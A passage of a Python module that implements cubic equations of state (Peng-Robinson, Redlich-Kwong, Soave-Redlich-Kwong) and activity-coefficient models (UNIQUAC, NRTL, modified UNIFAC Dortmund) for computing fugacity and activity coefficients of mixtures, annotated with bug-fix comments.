            """PR78 co-volume b [m^3/mol] for a pure component."""
            Tc = float(component.CriticalTemperature)
            Pc = float(component.CriticalPressure)
            return (0.077796 * R * Tc) / Pc

        kijs = {}
        if kij_input is None:
            def calculate_kij(c1, c2, tune):
                """Estimate kij from critical volumes (default tune 1.2)."""
                Vc1 = float(c1.CriticalVolume)
                Vc2 = float(c2.CriticalVolume)
                return 1 - (2 * sqrt((Vc1 ** 0.333) * (Vc2 ** 0.333))
                            / (Vc1 ** 0.333 + Vc2 ** 0.333)) ** tune
            if kij_tune is not None:
                for i in range(n):
                    for j in range(n):
                        if i == j:
                            kijs[(i, j)] = 0
                        elif kij_tune.get((i, j)) is not None:
                            kijs[(i, j)] = calculate_kij(cs[i], cs[j], kij_tune[(i, j)])
                # BUGFIX: mirror in a second pass so a tune supplied only as
                # (j, i) no longer raises KeyError; untouched pairs default to 0.
                for i in range(n):
                    for j in range(n):
                        if (i, j) not in kijs:
                            kijs[(i, j)] = kijs.get((j, i), 0)
            else:
                for i in range(n):
                    for j in range(n):
                        kijs[(i, j)] = calculate_kij(cs[i], cs[j], 1.2)
        else:
            for i in range(n):
                for j in range(n):
                    if i == j:
                        kijs[(i, j)] = 0
                    elif kij_input.get((i, j)) is not None:
                        # Reject implausibly large parameters (|kij| >= 0.3).
                        v = kij_input[(i, j)]
                        kijs[(i, j)] = v if abs(v) < 0.3 else 0
            # BUGFIX: mirror after the fill (see kij_tune branch above).
            for i in range(n):
                for j in range(n):
                    if (i, j) not in kijs:
                        kijs[(i, j)] = kijs.get((j, i), 0)

        def calculate_amix(y, T):
            """Van der Waals one-fluid mixing rule for a(T)."""
            amix = 0
            for i in range(n):
                for j in range(n):
                    ai = calculate_a(cs[i], T)
                    aj = calculate_a(cs[j], T)
                    amix += y[i] * y[j] * sqrt(ai * aj) * (1 - kijs[(i, j)])
            return amix

        def calculate_bmix(y):
            """Linear mixing rule for b."""
            return sum(y[i] * calculate_b(cs[i]) for i in range(n))

        def calculate_A(a, T):
            """Dimensionless A for a pure-component a or amix."""
            return a * P / (R ** 2) / (T ** 2)

        def calculate_B(b, T):
            """Dimensionless B for a pure-component b or bmix."""
            return b * P / (R * T)

        def calculate_Z(A, B, T):
            """Largest real root of the PR cubic -> vapor compressibility.

            BUGFIX: numpy.roots may return complex roots; take the largest
            (near-)real one instead of max() over complex values.
            """
            coefficients = [1, B - 1, A - 2 * B - 3 * B ** 2, B ** 2 + 2 * B - A * B]
            real_roots = [r.real for r in np_roots(coefficients) if abs(r.imag) < 1e-9]
            return max(real_roots)

        amix = calculate_amix(y, T)
        bmix = calculate_bmix(y)
        A = calculate_A(amix, T)
        B = calculate_B(bmix, T)
        Z = calculate_Z(A, B, T)

        def calculate_phi(i, T):
            """Vapor fugacity coefficient for component index i (PR form)."""
            comp = cs[i]
            b = calculate_b(comp)
            ak = 0  # sum_k y_k (1 - k_ki) sqrt(a_k a_i)
            for k in range(n):
                ak += y[k] * (1 - kijs[(k, i)]) * sqrt(calculate_a(cs[k], T) * calculate_a(comp, T))
            lnphi = (b * (Z - 1) / bmix - log(Z - B)
                     - A / (sqrt(8) * B) * (2 * ak / amix - b / bmix)
                     * log((Z + 2.414 * B) / (Z - 0.414 * B)))
            return exp(lnphi)

        return [calculate_phi(i, T) for i in range(n)], kijs
class RK ():
    def phi_vapor(components, temp, pressure, fractions, kij_input=None, kij_tune=None):
        """Redlich-Kwong EOS solver: vapor-phase fugacity coefficients.

        Args:
            components: sequence of chemicals exposing string attributes
                CriticalTemperature [K], CriticalPressure [Pa] and
                CriticalVolume [m^3/mol].
            temp: system temperature [K].
            pressure: system pressure [Pa].
            fractions: vapor-phase mole fractions, same order as components.
            kij_input: optional dict {(i, j): kij}; |kij| >= 0.3 rejected.
            kij_tune: optional dict {(i, j): tune} for the kij estimate.

        Returns:
            (phi, kijs): fugacity-coefficient list and the kij dict used.
        """
        cs = components
        T = temp       # K
        P = pressure   # Pa
        R = 8.314462   # J/(mol K)
        y = fractions
        n = len(cs)

        def calculate_a(component):
            """RK attraction parameter a [Pa m^6 K^0.5 / mol^2] (T-independent)."""
            Tc = float(component.CriticalTemperature)
            Pc = float(component.CriticalPressure)
            return 0.427480 * (R ** 2) * (Tc ** 2.5) / Pc

        def calculate_b(component):
            """RK co-volume b [m^3/mol] for a pure component."""
            Tc = float(component.CriticalTemperature)
            Pc = float(component.CriticalPressure)
            return (0.086640 * R * Tc) / Pc

        kijs = {}
        if kij_input is None:
            def calculate_kij(c1, c2, tune):
                """Estimate kij from critical volumes (default tune 1.2)."""
                Vc1 = float(c1.CriticalVolume)
                Vc2 = float(c2.CriticalVolume)
                return 1 - (2 * sqrt((Vc1 ** 0.333) * (Vc2 ** 0.333))
                            / (Vc1 ** 0.333 + Vc2 ** 0.333)) ** tune
            if kij_tune is not None:
                for i in range(n):
                    for j in range(n):
                        if i == j:
                            kijs[(i, j)] = 0
                        elif kij_tune.get((i, j)) is not None:
                            kijs[(i, j)] = calculate_kij(cs[i], cs[j], kij_tune[(i, j)])
                # BUGFIX: mirror in a second pass so a tune supplied only as
                # (j, i) no longer raises KeyError; untouched pairs default to 0.
                for i in range(n):
                    for j in range(n):
                        if (i, j) not in kijs:
                            kijs[(i, j)] = kijs.get((j, i), 0)
            else:
                for i in range(n):
                    for j in range(n):
                        kijs[(i, j)] = calculate_kij(cs[i], cs[j], 1.2)
        else:
            for i in range(n):
                for j in range(n):
                    if i == j:
                        kijs[(i, j)] = 0
                    elif kij_input.get((i, j)) is not None:
                        # Reject implausibly large parameters (|kij| >= 0.3).
                        v = kij_input[(i, j)]
                        kijs[(i, j)] = v if abs(v) < 0.3 else 0
            # BUGFIX: mirror after the fill (see kij_tune branch above).
            for i in range(n):
                for j in range(n):
                    if (i, j) not in kijs:
                        kijs[(i, j)] = kijs.get((j, i), 0)

        def calculate_amix(y):
            """Van der Waals one-fluid mixing rule for a."""
            amix = 0
            for i in range(n):
                for j in range(n):
                    ai = calculate_a(cs[i])
                    aj = calculate_a(cs[j])
                    amix += y[i] * y[j] * sqrt(ai * aj) * (1 - kijs[(i, j)])
            return amix

        def calculate_bmix(y):
            """Linear mixing rule for b."""
            return sum(y[i] * calculate_b(cs[i]) for i in range(n))

        def calculate_A(a, T):
            """Dimensionless A (note T^2.5 — RK's a carries a T^0.5 factor)."""
            return a * P / (R ** 2) / (T ** 2.5)

        def calculate_B(b, T):
            """Dimensionless B for a pure-component b or bmix."""
            return b * P / (R * T)

        def calculate_Z(A, B, T):
            """Largest real root of the RK cubic -> vapor compressibility.

            BUGFIX: numpy.roots may return complex roots; take the largest
            (near-)real one instead of max() over complex values.
            """
            coefficients = [1, -1, A - B - B ** 2, -A * B]
            real_roots = [r.real for r in np_roots(coefficients) if abs(r.imag) < 1e-9]
            return max(real_roots)

        amix = calculate_amix(y)
        bmix = calculate_bmix(y)
        A = calculate_A(amix, T)
        B = calculate_B(bmix, T)
        Z = calculate_Z(A, B, T)

        def calculate_phi(i, T):
            """Vapor fugacity coefficient for component *index* i (RK form)."""
            comp = cs[i]
            a = calculate_a(comp)
            b = calculate_b(comp)
            Ai = calculate_A(a, T)
            Bi = calculate_B(b, T)
            lnphi = Bi / B * (Z - 1) - log(Z - B) + A / B * (Bi / B - 2 * (Ai / A) ** 0.5) * log(1 + B / Z)
            return exp(lnphi)

        # --- Departure/ideal-gas helpers below are not called anywhere in
        # this method; retained for future use.  BUGFIX: they previously
        # passed the component object to calculate_phi, which expects an
        # index (it does cs[i]) and would have crashed if ever invoked.
        def h_deperture(cs):
            """Departure enthalpy [J/mol] via numerical d(ln phi)/dT."""
            h_dep = 0
            for i in range(len(cs)):
                der1 = log(calculate_phi(i, T + 0.001))
                der2 = log(calculate_phi(i, T - 0.001))
                h_dep += (-R * T ** 2) * (der1 - der2) / 0.002 * y[i]
            return h_dep

        def ig_enthalpy(cs):
            """Mixture ideal-gas enthalpy [kJ/kmol]; requires project dbcall."""
            enthalpy = 0
            for i in range(len(cs)):
                enthalpy += dbcall.ig_enthalpy(cs[i].IdealGasHeatCapacityCp, T) * y[i]
            return enthalpy / 1000

        def s_deperture(cs):
            """Departure entropy [J/(mol K)] via numerical d(ln phi)/dT."""
            s_dep = 0
            for i in range(len(cs)):
                der1 = log(calculate_phi(i, T + 0.001))
                der2 = log(calculate_phi(i, T - 0.001))
                dphi = (der1 - der2) / 0.002
                s_dep += (-R * (T * dphi + log(calculate_phi(i, T)))) * y[i]
            return s_dep

        def ig_entropy(cs):
            """Mixture ideal-gas entropy; requires project dbcall."""
            entropy = 0
            P0 = 101325  # reference pressure, Pa
            for i in range(len(cs)):
                entropy += (dbcall.ig_entropy(cs[i].IdealGasHeatCapacityCp, T)
                            - R * 1000 * log(P / P0) - R * 1000 * log(y[i])) * y[i]
            return entropy / 1000

        def gibbs_energy():
            """Mixture Gibbs energy from the helpers above (unused)."""
            return (ig_enthalpy(cs) + h_deperture(cs)) - (ig_entropy(cs) + s_deperture(cs)) * T

        return [calculate_phi(i, T) for i in range(n)], kijs
class SRK():
    def phi_vapor(components, temp, pressure, fractions, kij_input=None, kij_tune=None):
        """Soave-Redlich-Kwong EOS solver: vapor-phase fugacity coefficients.

        Args:
            components: sequence of chemicals exposing string attributes
                AcentricityFactor, CriticalTemperature [K], CriticalPressure
                [Pa] and CriticalVolume [m^3/mol].
            temp: system temperature [K].
            pressure: system pressure [Pa].
            fractions: vapor-phase mole fractions, same order as components.
            kij_input: optional dict {(i, j): kij}; |kij| >= 0.3 rejected.
            kij_tune: optional dict {(i, j): tune} for the kij estimate.

        Returns:
            (phi, kijs): fugacity-coefficient list and the kij dict used.
        """
        cs = components
        T = temp       # K
        P = pressure   # Pa
        R = 8.314462   # J/(mol K)
        y = fractions
        n = len(cs)

        def calculate_a(component, T):
            """SRK a(T) [Pa m^6/mol^2] for a pure component."""
            w = float(component.AcentricityFactor)
            Tc = float(component.CriticalTemperature)
            Pc = float(component.CriticalPressure)
            Tr = T / Tc
            kappa = 0.48 + 1.574 * w - 0.176 * w ** 2  # SRK kappa
            c = 0.42747 * (R ** 2) * (Tc ** 2) / Pc
            alfaT = (1 + kappa * (1 - Tr ** 0.5)) ** 2
            return c * alfaT

        def calculate_b(component):
            """SRK co-volume b [m^3/mol] for a pure component."""
            Tc = float(component.CriticalTemperature)
            Pc = float(component.CriticalPressure)
            return (0.08664 * R * Tc) / Pc

        kijs = {}
        if kij_input is None:
            def calculate_kij(c1, c2, tune):
                """Estimate kij from critical volumes (default tune 1.2)."""
                Vc1 = float(c1.CriticalVolume)
                Vc2 = float(c2.CriticalVolume)
                return 1 - (2 * sqrt((Vc1 ** 0.333) * (Vc2 ** 0.333))
                            / (Vc1 ** 0.333 + Vc2 ** 0.333)) ** tune
            if kij_tune is not None:
                for i in range(n):
                    for j in range(n):
                        if i == j:
                            kijs[(i, j)] = 0
                        elif kij_tune.get((i, j)) is not None:
                            kijs[(i, j)] = calculate_kij(cs[i], cs[j], kij_tune[(i, j)])
                # BUGFIX: mirror in a second pass so a tune supplied only as
                # (j, i) no longer raises KeyError; untouched pairs default to 0.
                for i in range(n):
                    for j in range(n):
                        if (i, j) not in kijs:
                            kijs[(i, j)] = kijs.get((j, i), 0)
            else:
                for i in range(n):
                    for j in range(n):
                        kijs[(i, j)] = calculate_kij(cs[i], cs[j], 1.2)
        else:
            for i in range(n):
                for j in range(n):
                    if i == j:
                        kijs[(i, j)] = 0
                    elif kij_input.get((i, j)) is not None:
                        # Reject implausibly large parameters (|kij| >= 0.3).
                        v = kij_input[(i, j)]
                        kijs[(i, j)] = v if abs(v) < 0.3 else 0
            # BUGFIX: mirror after the fill (see kij_tune branch above).
            for i in range(n):
                for j in range(n):
                    if (i, j) not in kijs:
                        kijs[(i, j)] = kijs.get((j, i), 0)

        def calculate_amix(y, T):
            """Van der Waals one-fluid mixing rule for a(T)."""
            amix = 0
            for i in range(n):
                for j in range(n):
                    ai = calculate_a(cs[i], T)
                    aj = calculate_a(cs[j], T)
                    amix += y[i] * y[j] * sqrt(ai * aj) * (1 - kijs[(i, j)])
            return amix

        def calculate_bmix(y):
            """Linear mixing rule for b."""
            return sum(y[i] * calculate_b(cs[i]) for i in range(n))

        def calculate_A(a, T):
            """Dimensionless A for a pure-component a or amix."""
            return a * P / (R ** 2) / (T ** 2)

        def calculate_B(b, T):
            """Dimensionless B for a pure-component b or bmix."""
            return b * P / (R * T)

        def calculate_Z(A, B, T):
            """Largest real root of the SRK cubic -> vapor compressibility.

            BUGFIX: numpy.roots may return complex roots; take the largest
            (near-)real one instead of max() over complex values.
            """
            coefficients = [1, -1, A - B - B ** 2, -A * B]
            real_roots = [r.real for r in np_roots(coefficients) if abs(r.imag) < 1e-9]
            return max(real_roots)

        amix = calculate_amix(y, T)
        bmix = calculate_bmix(y)
        A = calculate_A(amix, T)
        B = calculate_B(bmix, T)
        Z = calculate_Z(A, B, T)

        def calculate_phi(i, T):
            """Vapor fugacity coefficient for component index i (SRK form)."""
            comp = cs[i]
            b = calculate_b(comp)
            ak = 0  # sum_k y_k (1 - k_ki) sqrt(a_k a_i)
            for k in range(n):
                ak += y[k] * (1 - kijs[(k, i)]) * sqrt(calculate_a(cs[k], T) * calculate_a(comp, T))
            lnphi = b * (Z - 1) / bmix - log(Z - B) - A / B * (2 * ak / amix - b / bmix) * log((Z + B) / Z)
            return exp(lnphi)

        return [calculate_phi(i, T) for i in range(n)], kijs

    def phi_liquid(components, temp, pressure, fractions, kij_input=None, kij_tune=None):
        """Soave-Redlich-Kwong EOS solver: liquid-phase fugacity coefficients.

        Identical to phi_vapor except that the *smallest* positive real root
        of the cubic is used for the compressibility factor (liquid branch).

        Args:
            components: sequence of chemicals exposing string attributes
                AcentricityFactor, CriticalTemperature [K], CriticalPressure
                [Pa] and CriticalVolume [m^3/mol].
            temp: system temperature [K].
            pressure: system pressure [Pa].
            fractions: liquid-phase mole fractions, same order as components.
            kij_input: optional dict {(i, j): kij}; |kij| >= 0.3 rejected.
            kij_tune: optional dict {(i, j): tune} for the kij estimate.

        Returns:
            (phi, kijs): fugacity-coefficient list and the kij dict used.
        """
        cs = components
        T = temp       # K
        P = pressure   # Pa
        R = 8.314462   # J/(mol K)
        y = fractions
        n = len(cs)

        def calculate_a(component, T):
            """SRK a(T) [Pa m^6/mol^2] for a pure component."""
            w = float(component.AcentricityFactor)
            Tc = float(component.CriticalTemperature)
            Pc = float(component.CriticalPressure)
            Tr = T / Tc
            kappa = 0.48 + 1.574 * w - 0.176 * w ** 2  # SRK kappa
            c = 0.42747 * (R ** 2) * (Tc ** 2) / Pc
            alfaT = (1 + kappa * (1 - Tr ** 0.5)) ** 2
            return c * alfaT

        def calculate_b(component):
            """SRK co-volume b [m^3/mol] for a pure component."""
            Tc = float(component.CriticalTemperature)
            Pc = float(component.CriticalPressure)
            return (0.08664 * R * Tc) / Pc

        kijs = {}
        if kij_input is None:
            def calculate_kij(c1, c2, tune):
                """Estimate kij from critical volumes (default tune 1.2)."""
                Vc1 = float(c1.CriticalVolume)
                Vc2 = float(c2.CriticalVolume)
                return 1 - (2 * sqrt((Vc1 ** 0.333) * (Vc2 ** 0.333))
                            / (Vc1 ** 0.333 + Vc2 ** 0.333)) ** tune
            if kij_tune is not None:
                for i in range(n):
                    for j in range(n):
                        if i == j:
                            kijs[(i, j)] = 0
                        elif kij_tune.get((i, j)) is not None:
                            kijs[(i, j)] = calculate_kij(cs[i], cs[j], kij_tune[(i, j)])
                # BUGFIX: mirror in a second pass so a tune supplied only as
                # (j, i) no longer raises KeyError; untouched pairs default to 0.
                for i in range(n):
                    for j in range(n):
                        if (i, j) not in kijs:
                            kijs[(i, j)] = kijs.get((j, i), 0)
            else:
                for i in range(n):
                    for j in range(n):
                        kijs[(i, j)] = calculate_kij(cs[i], cs[j], 1.2)
        else:
            for i in range(n):
                for j in range(n):
                    if i == j:
                        kijs[(i, j)] = 0
                    elif kij_input.get((i, j)) is not None:
                        # Reject implausibly large parameters (|kij| >= 0.3).
                        v = kij_input[(i, j)]
                        kijs[(i, j)] = v if abs(v) < 0.3 else 0
            # BUGFIX: mirror after the fill (see kij_tune branch above).
            for i in range(n):
                for j in range(n):
                    if (i, j) not in kijs:
                        kijs[(i, j)] = kijs.get((j, i), 0)

        def calculate_amix(y, T):
            """Van der Waals one-fluid mixing rule for a(T)."""
            amix = 0
            for i in range(n):
                for j in range(n):
                    ai = calculate_a(cs[i], T)
                    aj = calculate_a(cs[j], T)
                    amix += y[i] * y[j] * sqrt(ai * aj) * (1 - kijs[(i, j)])
            return amix

        def calculate_bmix(y):
            """Linear mixing rule for b."""
            return sum(y[i] * calculate_b(cs[i]) for i in range(n))

        def calculate_A(a, T):
            """Dimensionless A for a pure-component a or amix."""
            return a * P / (R ** 2) / (T ** 2)

        def calculate_B(b, T):
            """Dimensionless B for a pure-component b or bmix."""
            return b * P / (R * T)

        def calculate_Z(A, B, T):
            """Smallest positive real root -> liquid compressibility.

            BUGFIX: the original loop could (a) raise UnboundLocalError when
            the cubic has a single real root, and (b) return the *middle*
            root instead of the smallest when three real roots exist.  Take
            min() over the positive real roots; fall back to the largest
            real root when no smaller positive root is available.
            """
            coefficients = [1, -1, A - B - B ** 2, -A * B]
            real_roots = [r.real for r in np_roots(coefficients) if abs(r.imag) < 1e-9]
            positive = [r for r in real_roots if r > 0]
            if positive:
                return min(positive)
            return max(real_roots)

        amix = calculate_amix(y, T)
        bmix = calculate_bmix(y)
        A = calculate_A(amix, T)
        B = calculate_B(bmix, T)
        Z = calculate_Z(A, B, T)

        def calculate_phi(i, T):
            """Liquid fugacity coefficient for component index i (SRK form)."""
            comp = cs[i]
            b = calculate_b(comp)
            ak = 0  # sum_k y_k (1 - k_ki) sqrt(a_k a_i)
            for k in range(n):
                ak += y[k] * (1 - kijs[(k, i)]) * sqrt(calculate_a(cs[k], T) * calculate_a(comp, T))
            lnphi = b * (Z - 1) / bmix - log(Z - B) - A / B * (2 * ak / amix - b / bmix) * log((Z + B) / Z)
            return exp(lnphi)

        return [calculate_phi(i, T) for i in range(n)], kijs
class Ideal():
    """Ideal property method: unit fugacity and activity coefficients."""
    def phi_vapor(components, temp, pressure, fractions, kij_input = None, kij_tune=None):
        """Return unit vapor-phase fugacity coefficients (ideal gas).

        :param components: component list (only its length is used)
        :param temp: system temperature (unused for an ideal system)
        :param pressure: system pressure (unused for an ideal system)
        :param fractions: molar fractions (unused for an ideal system)
        :param kij_input: accepted for interface compatibility, ignored
        :param kij_tune: accepted for interface compatibility, ignored
        :return: (list of 1s, info dict) matching the other property methods
        """
        kijs = {"Parameters": "No interaction parameters for Ideal system."}
        return [1] * len(components), kijs
    def gamma(components, temp, fractions):
        """Return unit activity coefficients (ideal solution).

        :param components: component list (only its length is used)
        :param temp: system temperature (unused for an ideal system)
        :param fractions: molar fractions (unused for an ideal system)
        :return: (list of 1s, info dict) matching the other property methods
        """
        kijs = {"Parameters": "No interaction parameters for Ideal system."}
        return [1] * len(components), kijs
class Uniquac():
    """UNIQUAC model based activity coefficient calculations."""
    def gamma(components,temperature,fractions):
        """Liquid-phase activity coefficients via UNIQUAC.

        :param components: component objects exposing ``UniquacR``,
            ``UniquacQ``, ``UniquacQP`` and ``LibraryIndex`` attributes
        :param temperature: system temperature [K]
        :param fractions: liquid mole fractions, one per component
        :return: ((gamma_1, gamma_2), taus) -- the ``symmetric`` form below
            indexes C[0]/R[0] and C[1]/R[1], so only binaries are supported
        """
        cs = components
        T = temperature
        # BUGFIX: the original loop (`for item in x: item = 1E-05`) rebound
        # only the loop variable, so zero fractions were never replaced and
        # later caused log(0)/ZeroDivisionError. Sanitize into a copy.
        x = [1E-05 if item == 0 else item for item in fractions]
        r = []; q = []; qp = []
        for k in range(0,len(cs)):
            r.append( float(cs[k].UniquacR) )
            q.append( float(cs[k].UniquacQ) )
            qp.append( float(cs[k].UniquacQP) )
        #---Calculate teta and fi values for each substance
        teta = []; fi = []; tetap = [] #tetap = teta' prime value for gR calc.
        for i in range(0,len(cs)):
            fi_nom = x[i]*r[i] #fi Nominator
            fi_denom = 0 #fi Denominator
            teta_nom = x[i]*q[i]
            teta_denom = 0
            tetap_nom = x[i]*qp[i]
            tetap_denom = 0
            for j in range(0,len(cs)):
                fi_denom += x[j]*r[j]
                teta_denom += x[j]*q[j]
                tetap_denom += x[j]*qp[j]
            fi.append(fi_nom/fi_denom) #Fi value of the i. component
            teta.append(teta_nom/teta_denom) #teta value of the i. component
            tetap.append(tetap_nom/tetap_denom) #teta' prime value of the i. component
        def a_ij(id1, id2):
            """Look up the a_ij interaction parameter for a component pair
            in the UNIQUAC data file (semicolon-separated rows).
            NOTE(review): returns None when no parameters are found, which
            makes tau() raise a TypeError downstream -- confirm intent."""
            file_path = MODELS_URL+"uniquac.txt"
            with open(file_path, 'r') as f:
                isFound = False # Is parameters found?
                for line in f.readlines():
                    aux = line.split(';')
                    if aux[0] == id1 and aux[1] == id2:
                        a12 = aux[2]
                        isFound = True
                    elif aux[0] == id2 and aux[1] == id1:
                        a12 = aux[3]
                        isFound = True
                if isFound:
                    return float(a12) #units.mol_enthalpy(float(a12),"CGS","SI") #Convert to kJ/kmol
                else:
                    print('No parameters were found!')
        def tau(i,j):
            """Calculates tau_ij values"""
            if i == j:
                return 1
            else:
                id1 = cs[i].LibraryIndex
                id2 = cs[j].LibraryIndex
                return exp( -a_ij(id1,id2)/(1.9872*T)) #R = 1.9872 cal/mol.K
        taus = {}
        for i in range(0,len(cs)):
            for j in range(0,len(cs)):
                taus[(i,j)] = tau(i,j)
        def unsymmetric():
            # NOTE(review): kept for reference but never called below.
            l = [0,0]
            l[0] = 5*(r[0]-q[0]) - (r[0]-1)
            l[1] = 5*(r[1]-q[1]) - (r[1]-1)
            C1 = log(fi[0]/x[0]) + 5*q[0]*log(teta[0]/fi[0]) + fi[1]*(l[0]-r[0]*l[1]/r[1])
            R1 = qp[0]*log(tetap[0]+tetap[1]*taus[(1,0)]) + tetap[1]*qp[0]*(taus[(1,0)]/(tetap[0]+tetap[1]*taus[(1,0)]) - taus[(0,1)]/(tetap[1]+tetap[0]*taus[(0,1)]))
            return exp(C1+R1)
        def symmetric():
            """Combinatorial + residual parts; returns the two binary gammas."""
            C = []; R = []
            for i in range(0,len(cs)):
                C.append( 1 + log(fi[i]/x[i]) - fi[i]/x[i] -5*q[i]*( 1+ log(fi[i]/teta[i])- fi[i]/teta[i] ))
                for j in range(0,len(cs)):
                    if i != j :
                        R.append( qp[i]*( 1- log( tetap[j]*taus[(j,i)]+tetap[i] )- tetap[j]*taus[(i,j)]/(tetap[j]+tetap[i]*taus[(i,j)]) - tetap[i]/(tetap[j]*taus[(j,i)]+tetap[i]) ) )
            return exp(C[0]+R[0]), exp(C[1]+R[1])
        return symmetric(), taus
class NRTL():
    """NRTL Activity coefficient calculations"""
    def gamma(components, temperature, fractions):
        """Liquid-phase activity coefficients via the NRTL model.

        :param components: component objects exposing ``LibraryIndex``
        :param temperature: system temperature [K]
        :param fractions: liquid mole fractions, one per component
        :return: (gamma list, aij dict of (a12, alfa) pairs per (i, j))
        """
        cs = components
        T = temperature
        x = fractions
        def a_ij(id1, id2):
            """Look up (a12, alfa) for a component pair in the NRTL data file
            (semicolon-separated rows); falls back to defaults with a warning."""
            file_path = MODELS_URL+"nrtl.txt"
            with open(file_path, 'r') as f:
                isFound = False # Is parameters found?
                for line in f.readlines():
                    aux = line.split(';')
                    if aux[0] == id1 and aux[1] == id2:
                        a12 = aux[2]
                        alfa = aux[4]
                        isFound = True
                    elif aux[0] == id2 and aux[1] == id1:
                        alfa = aux[4]
                        a12 = aux[3]
                        isFound = True
                if isFound:
                    return float(a12), float(alfa) #units.mol_enthalpy(float(a12),"CGS","SI") #Convert to kJ/kmol
                else:
                    print('WARNING!: No parameters were found for a_ij! Default parameters were used')
                    return 100, 0.5 #Default parameters
        aij = {}
        for i in range(0,len(cs)):
            for j in range(0,len(cs)):
                if i != j:
                    aij[(i,j)] = a_ij( cs[i].LibraryIndex, cs[j].LibraryIndex )
        # PERF: the original recomputed tau()/G() repeatedly for the same
        # (i, j) pair inside the double loops below; compute each once.
        n = len(cs)
        tau = {}; Gij = {}
        for i in range(n):
            for j in range(n):
                if i == j:
                    tau[(i,j)] = 0   # tau_ii = 0 by definition
                    Gij[(i,j)] = 1   # G_ii = 1 by definition
                else:
                    t = aij[(i,j)][0]/(1.9872*T) #R = 1.9872 cal/mol.K
                    tau[(i,j)] = t
                    Gij[(i,j)] = exp(-aij[(i,j)][1]*t) # G_ij = exp(-alfa*tau)
        # S[i] = sum_j x_j G_ji ; C[i] = sum_j x_j G_ji tau_ji
        S = []; C = []
        for i in range(n):
            S.append(sum(x[j]*Gij[(j,i)] for j in range(n)))
            C.append(sum(x[j]*Gij[(j,i)]*tau[(j,i)] for j in range(n)))
        gamma = []
        for i in range(n):
            aux_k = sum(x[k]*Gij[(i,k)]*(tau[(i,k)] - C[k]/S[k])/S[k] for k in range(n))
            gamma.append( exp( C[i]/S[i] + aux_k) )
        return gamma, aij
class Dortmund():
    """Modified Unifac Dortmund model"""
    def gamma(components,temperature,fractions):
        """Liquid-phase activity coefficients via modified UNIFAC (Dortmund).

        :param components: component objects exposing ``ModifiedUnifac``
            (subgroup id, count) pairs
        :param temperature: system temperature [K]
        :param fractions: liquid mole fractions, one per component
        :return: (activity_coefficients, taus) where ``taus`` maps subgroup
            pairs to interaction terms exp(-(a + b*T + c*T^2)/T)
        """
        cs = components
        T = temperature
        # BUGFIX: the original loop (`for item in x: item = 1E-05`) rebound
        # only the loop variable, so zero fractions were never replaced and
        # later caused log(0)/ZeroDivisionError. Sanitize into a copy.
        x = [1E-05 if item == 0 else item for item in fractions]
        # Get Q and R values for groups
        groupi = []; groupk = {}; ip = {}
        file_path = MODELS_URL+"modfac.txt"
        with open(file_path, 'r') as f:
            lines = f.readlines()
        for i in range(0,len(cs)):
            groups = cs[i].ModifiedUnifac
            rk_data = []
            for pair in groups:
                for line in lines:
                    aux = line.split(';')
                    if aux[3] == str(pair[0]):
                        ip[pair[0]] = int(aux[0]) # subgroup -> main group id
                        if pair[0] in groupk.keys():
                            groupk[pair[0]][0].append((i,pair[1]))
                        else:
                            groupk[pair[0]] = ([(i, pair[1])], float(aux[4]), float(aux[5]))
                        rk_data.append( (pair[0], pair[1], float(aux[4]), float(aux[5])) )
                        break
            groupi.append(rk_data)
        #Calculate r and q values for components
        r = []; q = []
        for i in range(0,len(cs)):
            ri = 0; qi = 0
            for data in groupi[i]:
                ri += data[1]*data[2]
                qi += data[1]*data[3]
            r.append(ri)
            q.append(qi)
        # Calculation of residual and combinatorial parts
        # ln gamma_k = Qk*[ 1-log(sum(tetai*taui,k)) - sum [ (tetai*taui,m)/sum(tetaj*tauj,m)]
        # Calculate activity coefficients for each group
        group_names = [] # Get group numbers
        for key in groupk.keys():
            group_names.append(key)
        def X(k):
            """Calculates group fraction for k"""
            aux_group = groupk[k]
            aux1 = 0; aux2 = 0
            for item in aux_group[0]: #Item = (i, vi)
                vk = item[1]; i = item[0]
                aux1 += vk*x[i]
            for index in group_names:
                aux_grp = groupk[index][0]
                for itm in aux_grp:
                    aux2 += x[itm[0]]*itm[1]
            return aux1/aux2
        def tau(m,n):
            """Group-interaction term; reads (a, b, c) pairs from modfac_ip.txt."""
            if m == n:
                return 1
            else:
                file_name = MODELS_URL+"modfac_ip.txt"
                found = False
                m = ip[m]; n = ip[n] # map subgroups to main-group ids
                with open(file_name, 'r') as f:
                    lines = f.readlines()
                for line in lines:
                    line = line.split()
                    if m == n:
                        # same main group: zero interaction energy
                        aij = 0; bij = 0; cij = 0
                        found = True
                        break
                    elif int(line[0]) == m and int(line[1]) == n:
                        aij = float(line[2])
                        found = True
                        bij = float(line[3])
                        cij = float(line[4])
                        break
                    elif int(line[0]) == n and int(line[1]) == m:
                        # reverse direction stored in columns 5-7
                        aij = float(line[5])
                        found = True
                        bij = float(line[6])
                        cij = float(line[7])
                        break
                if found:
                    return exp( -(aij + bij*T + cij*T**2)/T)
                else:
                    print("WARNING! No MODFAC interaction parameters were found for groups",m,n)
                    return exp(-50/T) #default value
        taus = {}
        for m in group_names:
            for n in group_names:
                taus[(m,n)] = tau(m,n)
        Xk = [] #Calculate and store Xk values
        for k in group_names:
            Xk.append(X(k))
        Xi = [] #Calculate and store Xk values for pure components
        def X2(k, xi):
            """Calculates group fraction for k"""
            aux_group = groupk[k]
            aux1 = 0; aux2 = 0
            for item in aux_group[0]: #Item = (i, vi)
                vk = item[1]; i = item[0]
                aux1 += vk*xi[i]
            for index in group_names:
                aux_grp = groupk[index][0]
                for itm in aux_grp:
                    aux2 += xi[itm[0]]*itm[1]
            return aux1/aux2
        def teta(k):
            """Teta value for group m"""
            Qk = groupk[k][2]
            kk = group_names.index(k)
            aux = 0
            for n in group_names:
                nk = group_names.index(n)
                Qn = groupk[n][2]
                aux += Qn*Xk[nk]
            tet = groupk[k][2]*Xk[kk]/aux
            return tet
        for i in range(0,len(cs)):
            ki = []
            for k in group_names: # TODO: swap loop order (i outer, k inner)
                xi = x.copy()
                for j in range(0,len(xi)):
                    if i==j:
                        xi[j] = 1
                    else:
                        xi[j] = 0
                ki.append( X2(k,xi) )
            Xi.append(ki)
        def tetai(k, i):
            """Teta value for group m in pure component"""
            Qk = groupk[k][2]
            kk = group_names.index(k)
            aux = 0
            for n in group_names:
                nk = group_names.index(n)
                Qn = groupk[n][2]
                aux += Qn*Xi[i][nk]
            teti = groupk[k][2]*Xi[i][kk]/aux
            return teti
        teta_k = []; teta_ki = []
        for i in range(0,len(cs)):
            pure_k = []
            for k in group_names:
                pure_k.append(tetai(k,i))
            teta_ki.append(pure_k)
        for k in group_names:
